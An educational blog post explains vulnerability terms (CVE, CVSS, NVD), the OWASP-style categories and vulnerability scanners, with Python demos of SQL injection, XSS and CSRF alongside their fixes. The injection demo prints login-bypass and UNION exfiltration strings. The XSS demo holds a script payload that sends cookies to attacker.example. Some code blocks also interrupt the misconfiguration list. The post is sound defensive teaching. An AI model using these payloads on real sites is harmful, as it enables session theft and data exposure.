Define Your Terms
A security vulnerability is a flaw or bug that a threat agent (threat actor) could exploit. According to CrowdStrike, “A threat actor, also known as a malicious actor, is any person or organization that intentionally causes harm in the digital sphere.”
Once a flaw in a product is confirmed and publicly disclosed as a vulnerability, it is recorded in the CVE (Common Vulnerabilities and Exposures) list, which the MITRE Corporation operates. Each entry receives a CVE identifier from a CVE Numbering Authority (CNA); MITRE is the root CNA, and vendors such as Red Hat and Microsoft assign identifiers for flaws in their own products. Not every bug gets a CVE: a flaw that never ships in a released product is simply fixed.
Severity is quantified with a Common Vulnerability Scoring System (CVSS) score from 0.0 to 10.0. CVSS is a free and open standard maintained by the Forum of Incident Response and Security Teams (FIRST). One caveat: the widely quoted base score measures the intrinsic severity of the flaw (how easily it can be reached and how much confidentiality, integrity and availability it can cost), not the threat to a particular business. That depends on whether the affected system is exposed, whether an exploit exists and what controls surround it, which CVSS leaves to its temporal and environmental metrics.
The National Institute of Standards and Technology (NIST), a U.S. federal agency, hosts the National Vulnerability Database (NVD) and provides a CVSS calculator. The NVD ingests the MITRE CVE list and enriches each record with CVSS scores, CWE weakness classifications and CPE product identifiers, which is why scanners usually query the NVD rather than the bare CVE list. A CVE record itself need not carry a score.
Real live people spend a lot of time and money trying to break into specific high-value targets, and the bots that clever people have weaponized attack more cheaply and broadly at all hours of the day.
Main Security Vulnerability Categories
The main information security vulnerability categories are:
Broken Authentication
When credentials or session tokens are stolen, attackers can take over user identities and sessions and act as if they were the user.
Injection
Attackers supply input that the application splices into a command, most commonly a SQL query, so that the input is interpreted as code rather than as data. It can let attackers read sensitive data, modify or delete data, impersonate identities, and carry out other nefarious activities in the application’s name.
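The injection described above, as an added example that is not part of the original post: a login check written two ways against a constructed in-memory SQLite database. The vulnerable version splices the input into the statement text; the safe version passes it as a bound parameter. The account data and the attack strings are constructed for this example.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database with one account (example data only).

    The password is stored in clear text purely to keep the injection
    visible; a real system stores a salted password hash.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'correct horse battery staple')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Untrusted input spliced into the SQL text.

    The quote characters in the input become part of the statement, so the
    attacker can change its structure, not just the compared value.
    """
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the values travel separately from the statement.

    The driver binds them as data, so a quote in the input is just a quote.
    """
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    db = build_db()
    # Authentication bypass: the closing quote ends the password literal and
    # the OR makes the WHERE clause true for every row.
    bypass = "' OR '1'='1"
    print("vulnerable, bypass:", login_vulnerable(db, "alice", bypass))   # (1,)
    print("safe, bypass      :", login_safe(db, "alice", bypass))         # None
    # Data exfiltration: a UNION appends the password column to the result
    # and the comment marker (--) discards the rest of the original query.
    leak = "' UNION SELECT password FROM users --"
    print("vulnerable, leak  :", login_vulnerable(db, leak, "x"))         # ('correct horse battery staple',)
    print("safe, leak        :", login_safe(db, leak, "x"))               # None
    # The legitimate login still works with the safe version.
    print("safe, real creds  :", login_safe(db, "alice", "correct horse battery staple"))  # (1,)
```

Parameterisation is the fix, not input filtering: the safe version needs no blacklist of quote characters because the database never sees the input as SQL. The same principle applies to every other injection class (OS commands, LDAP, XPath): keep the command and the data on separate channels.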
Cross-site scripting (XSS)
This type of attack injects malicious script into a web page, and the browsers of other users then execute it. Its target is the website user rather than the server, threatening session cookies and other sensitive user information.
Cross-Site Request Forgery (CSRF)
An attacker’s page makes the victim’s browser send a request to a site where the victim is logged in. Because the browser attaches the session cookie automatically, the site treats the forged request as the user’s own unless it demands something the attacker cannot supply, such as a per-session token.
Security Misconfiguration
A configuration error that attackers can exploit. For example:
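As an added example (not code from the original post), here is the XSS flaw beside its fix in Python: a constructed attacker comment rendered without escaping, then rendered with the encoding each output context needs. The payload and the hostname in it are constructed for illustration.

```python
import html
import json

# Constructed attacker input for this example: a stored comment that tries
# to ship every visitor's cookies to an attacker-controlled host.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(comment: str) -> str:
    """Untrusted text concatenated straight into markup.

    The browser parses the <script> element and runs it for every visitor.
    """
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """HTML body context: escape < > & " ' so the text is displayed, not parsed."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attribute_safe(value: str) -> str:
    """Attribute context: always quote the attribute and escape the value."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def render_script_data_safe(value: str) -> str:
    """Script context: JSON-encode and neutralise "<".

    html.escape is the wrong tool here (the browser does not decode entities
    inside <script>), and a bare JSON string containing "</script>" would
    close the element early; encoding "<" as \\u003c keeps the data inert.
    """
    encoded = json.dumps(value).replace("<", "\\u003c")
    return f"<script>var comment = {encoded};</script>"


def contains_raw_payload(markup: str) -> bool:
    """Check used by this example: did the attacker's tag survive verbatim?"""
    return "<script>fetch(" in markup


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))   # executable script in the page
    print(render_comment_safe(PAYLOAD))         # &lt;script&gt;... shown as text
    print(render_attribute_safe('" onfocus="alert(1)'))
    print(render_script_data_safe("</script><script>alert(1)</script>"))
```

The point of the three renderers is that escaping is context-specific: the entity encoding that protects the HTML body is useless inside a `<script>` block, which is why template engines offer separate filters per context and why a Content Security Policy is worth having as a second layer.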
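CSRF works because the browser attaches the victim's session cookie to any request, including one triggered by an attacker's page. The standard defence is a token that the attacker cannot obtain. As an added example (not code from the original post), the following Python stand-in for a transfer endpoint derives a per-session token with an HMAC and rejects requests that lack it; the session identifiers, the request dictionaries and the server secret are constructed for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed server secret for this example; a real deployment loads it
# from a secret store and rotates it.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Derive the token from the session: unguessable, bound to one session,
    and verifiable without storing anything server-side."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Constant-time comparison so timing does not leak the expected value."""
    if not token:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), token)


def handle_transfer(request: dict) -> str:
    """Stand-in for a POST /transfer handler.

    `request` is a constructed dict with the parts that matter here: the
    cookies the browser attaches automatically and the submitted form fields.
    """
    session_id = request.get("cookies", {}).get("session")
    if session_id is None:
        return "401 not logged in"
    if not verify_csrf_token(session_id, request.get("form", {}).get("csrf_token", "")):
        return "403 CSRF check failed"
    form = request["form"]
    return f"200 transferred {form['amount']} to {form['to']}"


def legitimate_request(session_id: str) -> dict:
    """The site's own form, rendered with a token for the current session."""
    return {"cookies": {"session": session_id},
            "form": {"to": "rent", "amount": "500",
                     "csrf_token": issue_csrf_token(session_id)}}


def forged_request(victim_session_id: str, attacker_token: str = "") -> dict:
    """What an auto-submitting form on an attacker's page produces.

    The victim's browser still sends the victim's session cookie, but the
    attacker cannot read the victim's page and so cannot learn the token;
    at best they can supply a token minted for their own session.
    """
    return {"cookies": {"session": victim_session_id},
            "form": {"to": "attacker", "amount": "9999",
                     "csrf_token": attacker_token}}


if __name__ == "__main__":
    victim = "sess-victim-1234"        # constructed session ids
    attacker = "sess-attacker-5678"
    print(handle_transfer(legitimate_request(victim)))                          # 200 ...
    print(handle_transfer(forged_request(victim)))                              # 403 ...
    print(handle_transfer(forged_request(victim, issue_csrf_token(attacker))))  # 403 ...
```

Without the token check the forged request would succeed, since the cookie alone proves nothing about who built the request. Setting the session cookie with `SameSite=Lax` or `Strict` is a worthwhile second layer, but not a replacement: the token works regardless of browser behaviour.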
- Default passwords left in place
- No password strength requirements to prevent users from setting weak passwords that can easily be found in dictionary attacks
- Web server directory listings left enabled, possibly exposing files that shouldn’t be seen
- Unused software modules or plugins left enabled, increasing the attack surface
Outdated Software
Especially software that is no longer receiving security updates. Once a fix is published, attackers can compare the patched and unpatched versions to locate the flaw and build an exploit, so a component that was secure when deployed may be vulnerable six months later or even the next day.
For more on vulnerability categories, see our blog post on the OWASP Top 10. OWASP is the Open Web Application Security Project, which defines itself as “a nonprofit foundation that works to improve the security of software. Through community-led open-source software projects, hundreds of local chapters worldwide, tens of thousands of members, and leading educational and training conferences, the OWASP Foundation is the source for developers and technologists to secure the web.”
Applications that scan for vulnerabilities are available. Some are free and/or open source, some are commercial, and some have both a free and a paid edition.
Vulnerability scanners are automated tools that take an inventory of the software and library versions running on a host and match it against a database of known CVEs. Many also probe systems directly for exploitable conditions, such as a misconfigured service or an injectable parameter, rather than relying on version numbers alone.
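The version-matching core of such a scanner, as an added example that is not the code of any real product and also illustrates the outdated-software category above: a constructed package inventory is matched against constructed advisory records with affected-version ranges. The advisory identifiers are placeholders, not real CVE IDs, and the package names and versions are made up.

```python
import re

# Constructed advisory records for this example. The identifiers are
# placeholders, not real CVE IDs, and the products and versions are made up.
ADVISORIES = [
    {"id": "EXAMPLE-0001", "package": "libwidget", "introduced": "1.0.0", "fixed": "1.4.2", "cvss": 9.8},
    {"id": "EXAMPLE-0002", "package": "libwidget", "introduced": "1.4.0", "fixed": "1.4.5", "cvss": 5.3},
    {"id": "EXAMPLE-0003", "package": "fastparse", "introduced": "0.0.0", "fixed": "2.0.0", "cvss": 7.5},
    {"id": "EXAMPLE-0004", "package": "otherlib", "introduced": "3.0.0", "fixed": "3.10.0", "cvss": 6.1},
]

# Constructed package inventory, as a scanner agent would collect it from a host.
INVENTORY = {"libwidget": "1.4.3", "fastparse": "2.1.0", "otherlib": "3.9.7"}


def parse_version(text: str) -> tuple:
    """'1.4.3' -> (1, 4, 3).

    Numeric comparison matters: string comparison would put '1.10.0' before
    '1.9.0'. Pads to three components; suffixes such as '-beta' are ignored
    in this simplified parser.
    """
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(installed: str, introduced: str, fixed: str) -> bool:
    """Half-open range [introduced, fixed): the fixed version is not affected."""
    return parse_version(introduced) <= parse_version(installed) < parse_version(fixed)


def scan(inventory: dict, advisories: list) -> list:
    """Match installed versions against the advisory ranges, worst first."""
    findings = []
    for adv in advisories:
        installed = inventory.get(adv["package"])
        if installed is None:
            continue
        if is_affected(installed, adv["introduced"], adv["fixed"]):
            findings.append({"id": adv["id"], "package": adv["package"],
                             "installed": installed, "fixed": adv["fixed"],
                             "cvss": adv["cvss"]})
    return sorted(findings, key=lambda f: f["cvss"], reverse=True)


if __name__ == "__main__":
    for f in scan(INVENTORY, ADVISORIES):
        print(f"{f['cvss']:4.1f} {f['id']} {f['package']} {f['installed']} (fixed in {f['fixed']})")
```

Two findings come out: `otherlib 3.9.7` (which a string comparison would have missed, since "3.9.7" sorts after "3.10.0") and `libwidget 1.4.3`, which is past the fix for the critical advisory but inside the range of the later, lower-severity one. The caveat a practitioner needs: version matching cannot see backported fixes. A distribution that patches `libwidget 1.4.1` in place and keeps the version number will be reported as vulnerable although it is not, which is why production scanners consult the distribution's own security feed as well as the NVD, and why a finding is a lead to verify rather than a verdict.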
In general, the vulnerabilities fall into three classifications:
- System/Network: The application scans for system misconfiguration and network CVEs.
- Web: The application scans for SQL Injections, XSS, CSRF, etc.
- Software Analysis: Static Application Security Testing (SAST). A SAST tool analyzes source code to find security vulnerabilities without running the program. Each tool supports a fixed set of languages, sometimes one or two, sometimes a dozen or more.
In summary, vulnerability scanning is a vital process that spans many aspects of Information Technology (IT). Its tools are constantly evolving to keep up with new threats, an endless cat-and-mouse game in which the cats must keep adapting to stay ahead of the ever-evolving malicious mice.
- CrowdStrike’s explanation of a threat actor
- MITRE Corporation
- CVE database
- Forum of Incident Response and Security Teams (FIRST)
- Common Vulnerability Scoring System (CVSS) at NIST and CVSS at Wikipedia
- National Institute of Standards and Technology (NIST)
- National Vulnerability Database (NVD)
- Open Web Application Security Project (OWASP)